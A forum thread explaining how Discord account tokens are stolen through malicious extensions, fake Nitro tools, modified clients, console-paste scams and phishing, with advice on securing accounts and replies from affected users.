Discord token security: What is a discord token and how does it leak or get hacked?

Posting this because there’s a steady stream of “my Discord got hacked” posts on here and other places I go like reddit and 90% of them are totally token related. Going to break this down so people can actually understand what’s happening and what’s being saidf.

Your Discord token is a long string of characters that authenticates you to Discord. It’s like a session cookie except it doesn’t expire on a normal schedule and Discord doesn’t really invalidate them aggressively. When you log in with username + password + 2FA, you receive a token. That token is what every subsequent request uses. Not your password. only the token.

What this means in practice is if if someone steals your token, they don’t need your password. They don’t need your 2FA code. They have full access to your account until you take action that invalidates the token (logging out, changing your password, etc)

How tokens leak:

1. Browser extension malware from bad extensions read the local storage of websites you visit. Discord stores its token in browser local storage the extension reads it exfiltrates it and now the attacker has your account.

2. Malicious downloads from “Discord Nitro generators” and cracked games, sketch installers, etc. Tokenstealer payloads are extremely common in this space. Run one, they read your local Discord installation’s storage, exfiltrate the token. Very easy.

3. Modified Discord clients (BetterDiscord plugins from weird sources, custom clients on GitHub with hidden payloads, etc) sometimes exfiltrate tokens. The legit version of BetterDiscord doesn’t do this. Random GitHub forks might though.

4. Console pastes are common. The old classic. Someone tells you to paste a “free Nitro” or “see who unfriended you” command into your browser console while on the web app. The command reads your token and posts it to a webhook. Don’t ever paste anything into a browser console.

5. Phishing. is less common but still happens. Fake Discord login page, you enter credentials, they catch the resulting token. Usually someone you know gets you with this tho.

How to lock down:

• Use the desktop app, not the browser. Tokens are still extractable from the desktop client but you reduce extension based attack options.
• Look at your installed browser extensions. Less is more. Always.
• 2FA doesn’t protect you from token theft directly but it does mean you’ll receive an email when the attacker logs into your account from a new location, which is your detection mechanism.
• If you suspect compromise then go change your password immediately. Discord invalidates all existing tokens on password changes.

Token theft is the most common Discord attack vector and it’s almost 100% social engineering. The platform itself is usually not at fault tbh. The user gets tricked into running something that exfiltrates the token.

This is a great post but I’d like to just add that when you change password to invalidate tokens, do this from device you trust. If your computer has malware, new token gets stolen also. First clean machine, then change password. People miss this step, sort of important depending on what type of malware you may have.

One thing worth saying is token theft usually is not really counted as a data breach in the normal legal sense. Discord didnot leak the users password or login info. The attacker tricked the user or got malware on their device and stole the token that way. That is why hacked accounts do not really show up in Discord transparency reports the same way real platform breaches do.

Security researchers have also found that tons of Discord tokens are always floating around in malware logs. The exact number changes all the time but it is probably in the hundreds of thousands. Most of those accounts get used for spam scams fake accounts or more attacks or whatever.

ok I read all this and I dont even know if I have a token or where to find it. is this somethin I should actually be worry about as a normal user who doesnt download sketchy stuff?

I got hit by a token stealer in 2023 cause I downloaded a “free Nitro tool” from some forum , three days later my account is sending phishing links to all my friends. Took me a week to clean up the mess and it was embarrassing too

Lesson learned the hard way, nobody is giving away free Nitro. If a tool needs your token to work, the tool IS the threat.

oh god so the “see who unfriended you” console paste my friend told me about was prolly a token grabber wasnt it. fml.

this is why my 14 year old keeps getting his account taken over. he wont listen. sending him this thread and hoping the formatting is enough to hold his attention for five minutes.